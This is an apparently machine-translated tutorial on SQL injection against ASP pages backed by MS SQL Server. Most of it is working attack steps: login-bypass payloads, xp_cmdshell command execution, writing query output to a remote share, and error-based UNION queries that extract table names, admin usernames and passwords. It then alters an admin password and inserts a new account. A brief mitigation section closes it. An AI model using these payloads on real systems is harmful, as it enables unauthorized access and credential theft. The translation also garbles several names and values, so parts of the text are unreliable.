SQL Injection tips

First, you need to find the pages that allow data submission, such as login pages, search pages, feedback pages, and so on. Sometimes, some html
The page passes the required parameters to other ASP pages through the POST command. Therefore, sometimes you will not see the relevant information in the URL path
. However, you can check the "form" tag in the HTML source code to identify whether there is any parameter transfer or related code.
As follows:
<Form action = search/search. asp method = post>
<Input type = hidden name = A value = C>
</Form>
Each parameter transfer between the <form> and </form> tag pairs may be exploited (in the case of attacks) for SQL injection.

2.1 What should you do if you cannot find a page with input behaviors?
You can find some pages related to ASP, JSP, CGI, or PHP. Try to find some special URLs with some parameters, such:
Http: // duck/index. asp? Id = 10

3.0 how should you test whether these defects exist?
First, add some special character tags, such:
Hi' or 1 = 1 --
Search for some login pages, enter the following in the login ID and password field, or in the URL:
-Login: Hi' or 1 = 1 --
-Pass: Hi' or 1 = 1 --
-Http: // duck/index. asp? Id = Hi' or 1 = 1 --
If you want to perform this type of test in the form of 'hiding ', you can download the HTML webpage from the website to the local hard disk and modify its hidden part.
Such:
<Form action = http: // duck/search. asp met

Hod = post>
<Input type = hidden name = A value = "Hi' or 1 = 1 --">
</Form>
If you are lucky, it is estimated that you can log on successfully without the account and password.

3.1 why is it 'or 1 = 1?
Let's take a look at the importance of using 'or 1 = 1 -- in other examples. This method is different from the normal login method.
You can obtain some special information that cannot be obtained during normal login. Use the ASP page obtained from a link for example:
Http: // duck/index. asp? Category = food
In the above URL, 'category 'is a variable name, And 'food' is the value assigned to the variable. To achieve this (the link is successful ),
This ASP must contain the following code (the code we wrote to demonstrate this experiment ):
V_cat = request ("category ")
Sqlstr = "select * from product where pcategory = '" & v_cat &"'"
Set rsw.conn.exe cute (sqlstr)
As we can see, the variable value will be pre-processed and assigned to 'v _ cat', that is, the SQL statement will change:
Select * from product where pcategory = 'food'
This request will return the result obtained after comparing with the where condition. In this example, it is also 'food. Now imagine if
Let's change the URL to this:
Http: // duck/index. asp? Category = food 'or 1 = 1 --
Now the value of our variable v_cat is equivalent to "food" or 1 = 1 -- ". If we want to re-import the SQL request,
The SQL request will be:
Select * from product where pcategory = 'food' or 1 = 1 --'
Now this request selects each piece of information from the product table and does not check whether pcategory is equal to 'food '. End
The two '--' in the section is used to tell ms SQL Server to ignore the ending '(single quotation marks ). Sometimes
You can use '#' (well number) to replace '--' (double break number) here.
In any case, if the recipient is not an SQL Server (ms SQL Server here), or you cannot simply ignore it
If the last single quotes are omitted, you can try:
'Or 'A' = 'a
In this case, the entire SQL request will be changed:
Select * from product where pcategory = 'food' or 'A' = 'A'
It also returns the same result.
According to the actual situation, SQL Injection requests may change dynamically in a variety of ways:
'Or 1 = 1 --
"Or 1 = 1 --
Or 1 = 1 --
'Or 'A' = 'a
"Or" A "="
') Or ('A' = 'a

4.0 how to add instant execution commands to SQL Injection requests?
The servers that can perform SQL injection are usually machines that do not perform systematic configuration check. At this time, we can try to use SQL
Invocation request. The default ms SQL Server runs at the System user level, which is equivalent to the execution and access permissions of the system administrator.
Limits. We can use the extended storage process of ms SQL Server (such as master .. xp_mongoshell) to execute some life cycle of the remote system.
Order:
'; Exec master .. xp_mongoshell 'Ping 10.10.1.2 '--
If it fails, try to use "(double quotation marks) instead of '(single quotation marks ).
The second colon in the preceding example indicates the end of an SQL request (it also indicates that it is followed by a new SQL command ). To test
This line

Whether the ping command is successful. You can listen to the ICMP request packet on the machine 10.10.1.2 and check whether it comes from that SQL
The server can:
# Tcpdump ICMP
If you cannot get the ping request from the SQL Server and get the error message in the return value of the SQL request, it is possible
This is because the administrator of the SQL Server restricts web users to access these stored procedures.

5.0 How can I obtain the returned information of My SQL request?
We can use sp_makewebtask to write related requests to the URL during processing:
'; Exec master... sp_makewebtask "// 10.10.1.3/share/output.html", "select * From Information
_ Schema. Tables"
The prerequisite is that the "share" attribute of the target host must be set to "everyone ".

6.0 how can I get some important data from the ODBC error message returned by the database?
We can force ms SQL Server to expose the information we want from the returned information (such as the table
). For example, there is a URL:
Http: // duck/index. asp? Id = 10
In the above URL, we can try to use the union clause to add other request strings after the integer '10', for example:
Http: // duck/index. asp? Id = 10 Union select top 1 table_name from information_schema.tables --
In the above example, the system table information_schema.tables contains information about all the tables on this server. As for the table_name region
Including the name of each table. We chose to write this because we know it exists. In other words, our SQL query
The request is:
Select top 1 table_name from information_schema.tables-
After receiving the request data, the server will return the first table name of the database. When we use the union clause to add the request string to an integer of 10
When the ms SQL Server tries to convert the string to an integer. Since we cannot convert a string (nvarchar) to an integer (int
. The following error message is displayed on the server:
Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value'
Table1 'To a column of Data Type Int.
/Index. asp, line 5
This error message tells us all the information about the conversion error (including the table name we want to know ). In this instance
The first table name is "Table1 ". To get the next table name, we can send this request:
Http: // duck/index. asp? Id = 10 Union select top 1 table_name from information_schema.tables wh
Ere table_name not in ('table1 ')--
We can also use like to find related special words:
Http: // duck/index. asp? Id = 10 Union select top 1 table_name from in

Formation_schema.tables wh
Ere table_name like '% 25 login % 25 '--
Output:
Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value'
Admin_login 'To a column of Data Type Int.
/Index. asp, line 5

6.1 how to find the column name in the table?
We can use another important table information_schema.columns to list all the column names of a table:
Http: // duck/index. asp? Id = 10 Union select top 1 column_name from information_schema.columns
Where table_name = 'admin _ login '--
The output is as follows:
Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value'
Login_id 'To a column of Data Type Int.
/Index. asp, line 5
Now we have obtained the name of the first column. We can also use not in () to get the next column Name:
Http: // duck/index. asp? Id = 10 Union select top 1 column_name from information_schema.columns
Where table_name = 'admin _ login' where column_name not in ('login _ id ')--
Output:
Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value'
Login_name 'To a column of Data Type Int.
/Index. asp, line 5
Repeat this operation to obtain all the remaining column names, such as "password" and "details ". When we use
After the preceding request, you can obtain the column names (except for 'login _ id', 'login _ name', 'Password', and details ):
Http: // duck/index. asp? Id = 10 Union select top 1 column_name from information_schema.columns
Where table_name = 'admin _ login' where column_name not in ('login _ id', 'login _ name', 'Password'
, Details ')--
The output result is as follows:
Microsoft ole db provider for ODBC drivers error '80040e14'
[Microsoft] [odbc SQL Server Driver] [SQL Server] Order by items must appear in
The Select lis
T if the statement contains a Union operator.
/Index. asp, line 5

6.2 how can we find the data we need?
Now we need to identify some important tables and columns. We can use the same skills to ask the database for relevant information.
Now, let's ask what the first user name in the "admin_login" table is:
Http: // duck/index. asp? Id = 10 Union select top 1 login_name from admin_login --
Output:
Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value'
Neo 'To a column of Data Type Int.
/Index. asp, line 5
An administrator account is "Neo ". Finally, ask the Administrator what the password is:
Http: // duck/index. asp? Id = 10 Union select top 1 password from admin_login where login_name ='
Neo '--
Output:
Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value'
M4trix 'To a column of Data Type Int.
/Index. asp, line 5
Now we can use "Neo" and his password ("m4trix") to log on to the system.

6.3 how to obtain the numeric string value?
Here is a technical limitation. To convert numbers (numbers between 0-9) to normal text data, we cannot
Get the required error message. For example, we need to try to get the password with the account "trinity", which corresponds
The password is 31173 ":
Http: // duck/index. asp? Id = 10 Union select top 1 password from admin_login where login_name ='
Trinity '--
In this way, we can only get error messages such as "Page not found. The main problem is that
If the union clause is used, the password "31173" will be converted to a value by the system. In this case, the UN
The ion statement call is 'legitimate ', and the SQL server will not return any ODBC error information, so we cannot obtain these
Digital data.
To solve this problem, we can add some alphabet to these data strings to determine whether the conversion process is wrong. Let's try.
Use the following request to replace the original request:
Http: // duck/index. asp? Id = 10 Union select top 1 convert (INT, password % 2B '% 20morpheus') from
Admin_login where login_name = 'delimiterity '--
Here we just add a plus sign (+) and other characters we want to add (in ASCII, '+' is equal to 0x2b ). Me
Add a (% 20) space and

Morpheus (any string) enters the actual password data. In this way, even if we get
The number string '20140901', which will also change to '123456 '.
After the convert () function is executed, the system will try to convert '2017 Morpheus 'to the integer type. The SQL Server will certainly return this
ODBC error message:
Microsoft ole db provider for ODBC drivers error '80040e07'
[Microsoft] [odbc SQL Server Driver] [SQL Server] syntax error converting the nvarchar value'
31173 Morpheus 'To a column of Data Type Int.
/Index. asp, line 5
Now you can know that the password for 'trinity 'is '123.

7.0 how to update/insert data in the database?
After successfully collecting all the columns in the table, we can update (update/modify) the original data in the table or insert (ADD) the new
. For example, we want to change the password of the Account "Neo:
Http: // duck/index. asp? Id = 10; update 'admin _ login' 'set 'Password' = 'newpas5' where login_na
Me = 'neo '--
Add a new record:
Http: // duck/index. asp? Id = 10; insert into 'admin _ login' ('login _ id', 'login _ name', 'password
', 'Details') values (666, 'neo2', 'newpa5', 'na ')--
Now we can log on to the system with the account "neo2" and password "newpas5.

8.0 how to avoid SQL injection attacks?
Filter special characters such as single quotes, double quotes, slashes, backslashes, colons, and empty characters. The filtered objects include:
-User input
-Parameters in the submitted URL request
-Data obtained from cookies
Before you convert a numeric value to an integer, you must declare an SQL statement, or use isnumeric to determine whether it is an integer.
Modify the user running level of "Startup and run SQL Server" to a lower level.
Delete a series of stored procedures that you do not need, such:
Master.. xp_mongoshell, xp_startmail, xp_sendmail, sp_makewebtask